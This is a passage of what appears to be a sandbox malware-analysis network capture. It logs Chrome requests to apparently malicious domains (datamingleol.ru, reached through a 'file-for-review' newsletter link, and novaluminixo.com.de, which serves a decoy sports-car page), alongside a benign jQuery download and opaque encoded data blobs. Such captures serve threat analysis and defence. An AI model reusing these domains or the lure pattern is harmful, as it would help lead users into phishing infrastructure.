                                      2024-09-13 13:16:22 UTC1369INData Raw: 54 57 5c 2f 4e 44 6a 56 31 5c 2f 7a 6f 32 48 69 33 56 58 65 63 42 6a 6f 77 4f 4f 5a 53 67 48 37 74 33 48 55 79 7a 50 42 47 48 46 5a 45 79 43 35 53 68 75 61 38 67 56 69 49 6c 48 66 4c 6a 6b 31 4b 72 6e 34 75 49 49 46 31 6d 47 5c 2f 64 33 6e 37 51 6d 69 51 70 74 67 6b 67 6f 59 52 54 44 6a 6e 57 4a 73 71 79 77 2b 34 4f 50 4f 52 68 66 74 69 55 6c 62 64 57 4a 59 39 57 66 78 6f 50 55 42 34 32 68 44 2b 4e 77 44 4f 56 30 4d 34 6e 47 39 55 47 6e 6b 75 56 76 50 35 49 58 69 53 6e 62 57 53 55 78 6b 74 35 78 58 49 79 46 79 58 31 72 53 2b 58 34 48 2b 37 32 65 42 42 41 77 61 33 39 72 55 59 65 72 4f 6c 44 46 52 51 6e 63 32 75 46 57 54 71 4f 5c 2f 6c 66 70 56 63 61 6a 41 77 65 62 59 52 4e 66 47 2b 6a 6b 70 57 36 61 6e 43 43 59 38 31 66 67 73 53 38 70 56 4e 67 61 52 30 69
                                      Data Ascii: TW\/NDjV1\/zo2Hi3VXecBjowOOZSgH7t3HUyzPBGHFZEyC5Shua8gViIlHfLjk1Krn4uIIF1mG\/d3n7QmiQptgkgoYRTDjnWJsqyw+4OPORhftiUlbdWJY9WfxoPUB42hD+NwDOV0M4nG9UGnkuVvP5IXiSnbWSUxkt5xXIyFyX1rS+X4H+72eBBAwa39rUYerOlDFRQnc2uFWTqO\/lfpVcajAwebYRNfG+jkpW6anCCY81fgsS8pVNgaR0i
                                      2024-09-13 13:16:22 UTC1369INData Raw: 6f 34 52 49 4c 62 38 4d 75 34 42 39 79 46 44 30 49 54 46 76 36 37 62 38 4b 76 53 34 7a 6f 62 6d 65 36 39 4e 70 72 6b 46 48 63 68 46 58 61 56 74 37 47 4d 74 4a 38 41 48 43 70 33 34 46 31 63 68 2b 45 56 74 51 6d 34 61 6f 2b 78 30 4a 41 57 6a 37 72 34 52 41 79 42 43 53 79 30 4c 76 35 61 6d 64 4c 31 45 56 51 37 43 72 48 6f 74 49 33 49 44 45 6e 75 67 30 55 53 6f 39 52 30 6a 72 53 6e 58 58 67 79 4c 38 45 46 4a 48 63 67 31 54 39 44 6c 34 31 46 32 74 55 4a 68 73 50 49 58 61 31 6f 69 77 63 63 75 57 78 4f 2b 6d 63 52 41 76 63 4c 43 76 45 70 7a 6c 34 4b 52 35 32 52 49 77 47 75 38 4f 66 33 4f 6b 62 4e 39 79 42 33 75 75 66 32 62 6d 53 6d 36 78 70 2b 31 4c 56 69 6c 6a 51 56 47 78 74 49 54 63 38 73 5c 2f 65 4a 6b 66 4c 31 63 69 68 61 6c 6e 69 49 68 65 75 6c 58 6c 5a 42
                                      Data Ascii: o4RILb8Mu4B9yFD0ITFv67b8KvS4zobme69NprkFHchFXaVt7GMtJ8AHCp34F1ch+EVtQm4ao+x0JAWj7r4RAyBCSy0Lv5amdL1EVQ7CrHotI3IDEnug0USo9R0jrSnXXgyL8EFJHcg1T9Dl41F2tUJhsPIXa1oiwccuWxO+mcRAvcLCvEpzl4KR52RIwGu8Of3OkbN9yB3uuf2bmSm6xp+1LViljQVGxtITc8s\/eJkfL1cihalniIheulXlZB
                                      2024-09-13 13:16:22 UTC1369INData Raw: 72 4c 33 46 62 78 53 58 35 53 6f 50 76 61 61 66 33 61 48 2b 4a 42 6b 63 41 43 45 34 45 50 64 74 52 5a 2b 45 54 2b 4b 78 76 68 50 69 44 4d 4f 4c 57 59 4e 44 58 6d 75 6b 45 70 65 79 65 51 6f 59 71 63 30 53 46 30 50 2b 36 78 6a 51 73 7a 72 73 62 48 47 30 2b 44 63 71 55 4e 4e 58 51 31 66 65 37 45 77 30 73 71 6f 36 39 34 56 45 51 6e 55 76 48 4c 70 49 31 67 71 59 38 5a 58 46 74 36 69 33 38 57 53 6d 47 67 43 79 46 56 51 44 51 53 53 37 63 6b 79 55 41 53 65 7a 33 67 4f 4b 51 73 70 2b 6c 4c 39 65 4a 57 45 6b 62 52 53 5c 2f 55 64 56 32 36 39 4a 34 44 4d 6a 77 5c 2f 59 36 41 38 78 46 31 67 43 38 4b 4b 77 6e 6f 58 52 37 5a 5a 36 71 50 57 50 57 66 71 64 77 31 38 35 5c 2f 52 5c 2f 39 49 38 58 66 53 50 4a 66 44 6a 59 61 4f 59 42 4f 31 34 4b 7a 45 32 70 71 51 72 50 30 45
                                      Data Ascii: rL3FbxSX5SoPvaaf3aH+JBkcACE4EPdtRZ+ET+KxvhPiDMOLWYNDXmukEpeyeQoYqc0SF0P+6xjQszrsbHG0+DcqUNNXQ1fe7Ew0sqo694VEQnUvHLpI1gqY8ZXFt6i38WSmGgCyFVQDQSS7ckyUASez3gOKQsp+lL9eJWEkbRS\/UdV269J4DMjw\/Y6A8xF1gC8KKwnoXR7ZZ6qPWPWfqdw185\/R\/9I8XfSPJfDjYaOYBO14KzE2pqQrP0E
                                      2024-09-13 13:16:22 UTC1369INData Raw: 63 65 47 7a 65 52 5c 2f 56 34 4f 4f 71 2b 75 45 35 75 57 58 38 30 4c 55 79 37 6c 5c 2f 70 74 53 36 43 6a 72 46 4a 62 42 6e 4e 72 65 34 48 4f 6a 37 38 35 2b 51 5c 2f 69 77 70 58 2b 72 62 64 77 6a 7a 38 35 5a 36 42 46 49 58 41 42 6a 77 64 78 76 42 6a 34 4f 7a 30 39 76 4f 55 56 73 51 79 6c 69 31 65 4d 6b 4a 6c 77 69 59 6b 72 74 61 7a 74 78 34 63 50 54 5a 64 56 4d 56 79 4c 75 4b 74 79 70 30 34 48 4f 31 37 35 49 7a 42 71 58 73 50 34 49 46 35 71 54 35 47 72 43 30 7a 68 6f 5a 4d 73 55 66 4e 58 5c 2f 6e 50 67 69 69 63 63 30 51 77 31 6c 36 71 4c 63 54 49 58 4e 43 79 59 53 71 64 75 57 4f 4b 32 4b 69 79 6c 7a 42 67 39 75 77 48 6a 56 4a 45 37 4c 41 4b 4b 34 46 35 49 71 5a 66 73 74 5a 69 46 35 74 53 6b 52 47 50 65 66 34 37 52 6d 39 64 4d 38 37 4b 64 41 58 6f 75 47 6e
                                      Data Ascii: ceGzeR\/V4OOq+uE5uWX80LUy7l\/ptS6CjrFJbBnNre4HOj785+Q\/iwpX+rbdwjz85Z6BFIXABjwdxvBj4Oz09vOUVsQyli1eMkJlwiYkrtaztx4cPTZdVMVyLuKtyp04HO175IzBqXsP4IF5qT5GrC0zhoZMsUfNX\/nPgiicc0Qw1l6qLcTIXNCyYSqduWOK2KiylzBg9uwHjVJE7LAKK4F5IqZfstZiF5tSkRGPef47Rm9dM87KdAXouGn


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.449779188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:24 UTC725OUTGET /tN2d/, HTTP/1.1
                                      Host: datamingleol.ru
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: PHPSESSID=k0qm5f5og2nqg3439jrhip006m
                                      2024-09-13 13:16:24 UTC654INHTTP/1.1 404 Not Found
                                      Date: Fri, 13 Sep 2024 13:16:24 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      cache-control: private, no-cache, max-age=0
                                      pragma: no-cache
                                      vary: Accept-Encoding
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKj%2FpDoHOnyIEujKtMuVgP2GoHOddgsqedsy2ghMBPxCOCmwdWwmjxnn8WTqpfnNQHb%2BtUB6JlICJSER2twHg2UUJPmSnclkuvOfPkq%2BI5Uc0kM5Pyc1i3aEKbJvgTVA%2FEg%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c28695d086441f2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:24 UTC715INData Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                                      Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                                      2024-09-13 13:16:24 UTC541INData Raw: 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64
                                      Data Ascii: esource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid
                                      2024-09-13 13:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.449785151.101.66.1374434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:24 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                      Host: code.jquery.com
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://datamingleol.ru/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:25 UTC613INHTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 89501
                                      Server: nginx
                                      Content-Type: application/javascript; charset=utf-8
                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                      ETag: "28feccc0-15d9d"
                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Via: 1.1 varnish, 1.1 varnish
                                      Accept-Ranges: bytes
                                      Date: Fri, 13 Sep 2024 13:16:24 GMT
                                      Age: 2425168
                                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740060-EWR
                                      X-Cache: HIT, HIT
                                      X-Cache-Hits: 5889, 3
                                      X-Timer: S1726233385.981185,VS0,VE0
                                      Vary: Accept-Encoding
                                      2024-09-13 13:16:25 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                      2024-09-13 13:16:25 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                      2024-09-13 13:16:25 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                      2024-09-13 13:16:25 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                      2024-09-13 13:16:25 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                      2024-09-13 13:16:25 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.449787188.114.96.34434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:25 UTC344OUTGET // HTTP/1.1
                                      Host: novaluminixo.com.de
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:25 UTC659INHTTP/1.1 200 OK
                                      Date: Fri, 13 Sep 2024 13:16:25 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.3.33
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ED%2Bx9yWLT4mUjBXHipehAhlogzEtLZBx9gztNjbAGv7P1%2BwiF1lQoYJCsca%2FWwZXd9c8l2Q%2FIQ6Q2GgRnnj4Ow4YOIB5iKUS7WWF7jHAi9Su9mHAeSZtSgz21XvRfbTXpdK8NRhe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c28696398a51861-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-13 13:16:25 UTC710INData Raw: 31 61 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 70 6f 72 74 73 20 43 61 72 20 45 6e 74 68
                                      Data Ascii: 1a5f<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Sports Car Enth
                                      2024-09-13 13:16:25 UTC1369INData Raw: 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 53 70 6f 72 74 73 20 43 61 72 20 45 6e 74 68 75 73 69 61 73 74 73 20 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 62 73 2d 74 61 72 67 65 74 3d 22 23 6e 61 76 62 61 72 52 65 73 70 6f 6e 73 69 76 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6e 61 76 62 61 72 52 65 73 70 6f 6e 73 69 76 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69
                                      Data Ascii: s="fas fa-car"></i> Sports Car Enthusiasts </a> <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigati
                                      2024-09-13 13:16:25 UTC1369INData Raw: 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f 69 64 2f 4f 49 50 2e 79 79 62 74 53 37 35 30 7a 6a 51 62 62 69 48 36 4e 71 44 61 79 67 48 61 45 38 27 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 33 22 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 53 70 6f 72 74 73 20 43 61 72 20 45 6e 74 68 75 73 69 61 73 74 73 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22
                                      Data Ascii: ound-image: url('https://th.bing.com/th/id/OIP.yybtS750zjQbbiH6NqDaygHaE8'); background-size: cover; background-position: center;"> <div class="container"> <h1 class="display-3">Welcome to Sports Car Enthusiasts</h1> <p class="lead"
